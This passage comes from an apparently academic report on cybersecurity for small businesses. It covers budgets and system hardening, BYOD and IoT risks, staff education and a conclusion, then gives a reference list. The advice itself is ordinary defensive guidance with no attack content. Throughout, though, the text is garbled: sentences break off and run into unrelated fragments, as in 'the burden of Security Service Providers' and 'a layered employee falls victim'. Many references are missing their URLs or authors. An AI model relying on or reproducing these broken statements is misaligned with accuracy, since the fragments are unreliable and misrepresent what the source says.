Employer Profiles with dedicated IT personnel should review their current cybersecurity
health by performing a self-audit of assets, data, risks, resources, mitigation and recovery tactics
with stakeholders. Leadership must ensure that they have personnel who are accountable and
responsible for cybersecurity-related tasks only. Threat prevention is not a static effort in which
occasional software updates or virus scanning is deemed sufficient. Cyber threats are
constantly evolving, and in order to mitigate potential risks organizations must exercise vigilance
in their efforts.
This places a greater onus on Non-employer Profiles who already have the burden of
Security Service Providers (MSSP) who specialize in monitoring and management of systems
and devices. Owners of non-employer businesses can also take this challenge as an opportunity
to educate themselves on cyber protection since they have an advantage of having a less complex
Profile can also choose to go with the outsourced MSSP route or invest in training an employee
The fortification of both Profiles is not limited to having access to a security expert to
oversee operations. It also means collaborating with all departments to ensure that a layered
employee falls victim to social engineering techniques that exploit human behavior. Profiles
should strive to educate themselves and their staff about current and ongoing threats, if nothing
else just to create a sense of awareness. Cybersecurity is only as strong as the weakest link, and
6.3 Budget
Profiles lack sufficient budget to allocate to a security initiative, but this should not
prevent them from implementing best practices for systems hardening. Even large enterprises
“spend less than 10 percent of their IT budget on infosec” (Fruhlinger, 2018). Both employer
and non-employer profiles must learn to use the tools they already have at their
disposal. Profiles might not be able to afford, or have the personnel to manage, an IDS (Intrusion
Detection System) or IPS (Intrusion Prevention System), but even commercial off-the-shelf
firewall and antivirus solutions are better than nothing. A Business.com article stated “the
majority of small businesses have invested in antivirus software and firewall protection (81 and
76 percent, respectively)” (Rinaldi, 2019). Companies such as Symantec have affordable small
business solutions which cover workstations as well as mobile devices on both major platforms
Another simple system hardening practice is proper configuration of the router including
passwords (many users still leave the default password), guest wifi setup and management, as
well as adding Virtual Private Network (VPN) services for businesses that utilize remote access.
devices in order to have the most recent security features and patches is another good habit to try
identity, usually for logins or other transactions. Encrypting hard drives and emails are also good
For Profiles who deal with accepting credit cards / digital payments such as e-commerce
operations, or those who store confidential or sensitive customer information including but not
In the case of an incident, data loss, theft or breach, this will at least give some type of assistance
6.4 BYOD and IoT
It is advisable that Profile security policies address a common trend in the workplace,
Bring Your Own Device (BYOD), an umbrella term that can also include IoT devices.
Personal devices brought into the workplace that were not provided by the company add
potential entry points to the company’s attack surface. BYOD also contributes to the shadow IT
security without sacrificing the full potential and value that BYOD technologies might bring into
the organization. This will include user education in how to operate their mobile devices
responsibly both during and outside office hours. Creating an on-boarding process for BYOD
should be one of the primary objectives. “66% of IT professionals don’t know how many
devices employees bring into work, while an estimated 84% of companies have experienced an
IoT-related breach” (InfoSec Institute, 2018). An invisible device cannot be managed in the
network.
6.5 Continuous Education
Employer Profiles can integrate cybersecurity awareness into the company culture by
conducting dedicated meetings on the subject or allocating a portion of every meeting to review
relevant and recent topics. Internal newsletters can also be used to deliver information
containing news, tips, videos, and infographics. Informational one-sheets can be posted
throughout the establishment as well, and updated with fresh content on a scheduled release.
Employer Profiles who have the budget for penetration testers (pen testers) should consider
acquiring their services to test the security of their organization through ethical hacking
7. Conclusion
As the cyber threat landscape continues to evolve faster than businesses can keep up, it is
crucial for Profiles to take these imminent threats, and their total impact on the organization,
seriously. Small businesses assume that they are less of a target since they represent less
financial gain to cyber criminals. This assumption can give Profiles a false sense of security and
a lax attitude towards security in general. The most recent Q2 Cyberthreat Index survey
published by AppRiver revealed a pattern among larger SMBs (150-250 employees) and
smaller SMBs (1-49 employees): “SMBs could be underestimating their real cyberthreat risks”
(2019). In truth, they are at just as much risk as larger enterprises, with the added obstacle of
resource constraints.
Moreover, both Profiles share common sets of obstacles in terms of constraints in both
personnel and budget as well as not knowing where to start and how to go about fortifying their
businesses. To make matters worse, resources and organizations that are designed to assist
SMBs are difficult to navigate and often give vague and convoluted advice that is difficult to
synthesize.
Improvements have been made to reliable sources of information such as NIST and the SBA,
but the available guidance is nowhere near where it should and can be. Small business owners
will need to be proactive and do their due diligence in order to remain vigilant. Persistent and
dynamic threats
References
AppRiver. (2019). Cyberthreat index for business Q1 2019. Retrieved from https://www.appriver.com/files/documents/cyberthreatindex/AppRiver-Cyberthreat-Index-for-Business-Survey-exec-summary_FINAL.pdf
AppRiver. (2019). Cyberthreat index for business Q2. Retrieved May 6, 2019, from https://www.appriver.com/files/documents/cyberthreatindex/Q2-2019-AppRiver-Cyberthreat-Index-for-Business-Survey%20Report.pdf
Babson College. (2016). The state of small business in America. Retrieved from http://www.babson.edu/media/babson/site-assets/content-assets/images/news/announcements/goldman-10ksb-report-2016.pdf
Bayern, M. (2018, August 21). SMBs at higher risk of sophisticated cyberattacks: here are the
sophisticated-cyberattacks-here-are-the-top-threats/
Carlson, J. (2019, April 6). All of records erased, doctor's office closes after ransomware attack.
after-ransomware-attack/508180992/
Cisco.com. (n.d.). What is shadow IT?. Retrieved May 6, 2019, from https://www.cisco.com/c/en/us/products/security/what-is-shadow-it.html
CISO Mag. (2019, February 25). Cyber criminals cash in on millions with formjacking: ISTR.
formjacking-istr/
Davies, J. (2007, April 19). Non-broadcast wireless networks with Microsoft Windows.
bb726942(v=technet.10)#EDAA
Davis, J. (Health IT Security). (2019, March 27). 71% of ransomware attacks targeted small
attacks-targeted-small-businesses-in-2018
Fruhlinger, J. (2018, May 29). The state of IT security, 2018. Retrieved from https://www.cio.com/article/3274588/the-state-of-it-security-2018.html#slide7
InfoSec Institute. (2018, August 23). Security issues in edge computing and the IoT. Retrieved from https://resources.infosecinstitute.com/security-issues-in-edge-computing-and-the-iot/#gref
Kennedy, J., & Satran, M. (2018, May 30). About Dynamic Data Exchange. Retrieved from https://docs.microsoft.com/en-us/windows/desktop/dataxchg/about-dynamic-data-exchange
Web/Security/Subresource_Integrity
NICCS. (2016). Cybersecurity workforce development toolkit. Retrieved from NICCS / DHS website: https://niccs.us-cert.gov/workforce-development/cybersecurity-resources/cybersecurity-workforce-development-toolkit
NIST - CSRC. (2018, March 29). Access control policy and implementation guides.
Implementation-Guides
NYState.gov. (n.d.). Section 131: Definition of a small business. Retrieved from https://www.nysenate.gov/legislation/laws/COM/131
Ponemon Institute. (2018, November). 2018 State of cybersecurity in small & medium size
Report.pdf
Rash, W. (2019, February 27). You need to protect your website against formjacking right now.
website-against-formjacking-right-n
Rinaldi, A. (2019, January 14). The role of IT in SMB cybersecurity. Retrieved from https://www.business.com/articles/its-role-in-cybersecurity/
Rouse, M., & Rosencrance, L. (2018, July). What is advanced persistent threat (APT)?.
persistent-threat-APT
SBA.gov. (2016, February 26). Small business size standards. Retrieved from https://www.sba.gov/sites/default/files/files/Size_Standards_Table.pdf
default/files/advocacy/Nonemployer-Fact-Sheet.pdf
SBE Council. (n.d.). Facts & data on small business and entrepreneurship. Retrieved from http://sbecouncil.org/about-us/facts-and-data/
Stewart, B., & Charlton, D. (2019). Cyber attack inevitability: the threat small & midsize
en/_assets/doc/2019_01.31_cyber_whitepaper_chubb_r3.pdf
Switchfast. (2018). Cybersecurity mistakes all small business employees make, from entry level
Content%20Downloads/Switchfast_SMB_Cybersecurity_Report.pdf
Symantec. (2018). Internet security threat report (23). Retrieved from http://images.mktgassets.symantec.com/Web/Symantec/%7B3a70beb8-c55d-4516-98ed-1d0818a42661%7D_ISTR23_Main-FINAL-APR10.pdf?aid=elq_
Symantec. (2019). Internet security threat report (24). Retrieved from https://www.symantec.com/content/dam/symantec/docs/reports/istr-24-executive-summary-en.pdf
Thompson, M. (2019, January 24). Why cybercrime targets small business. Retrieved from https://smallbiztrends.com/2016/05/cybercrime-targets-small-businesses.html
TrendMicro. (2017, November 22). DDE: What it is, what it does, and how to defend against
security/news/threat-landscape/dde-what-it-is-what-it-does-and-how-to-defend-against-attackers-who-may-exploit-it
U.S. Census Bureau. (2018, June 21). U.S. 2016 nonemployer statistics. Retrieved from https://factfinder.census.gov/faces/tableservices/jsf/pages/productview.xhtml?pid=NES_2015_00A1&prodType=table
U.S. Senate: Committee on Small Business and Entrepreneurship. (2018). Preparing small business for cybersecurity success (S. Hr. 115-300). Retrieved from Committee on Small
CHRG-115shrg30630/pdf/CHRG-115shrg30630.pdf
U.S. Small Business Administration Office of Advocacy. (2016, June). SBA: Frequently asked
FAQ-2016_WEB.pdf
publication/324455350_2018_Verizon_Data_Breach_Investigations_Report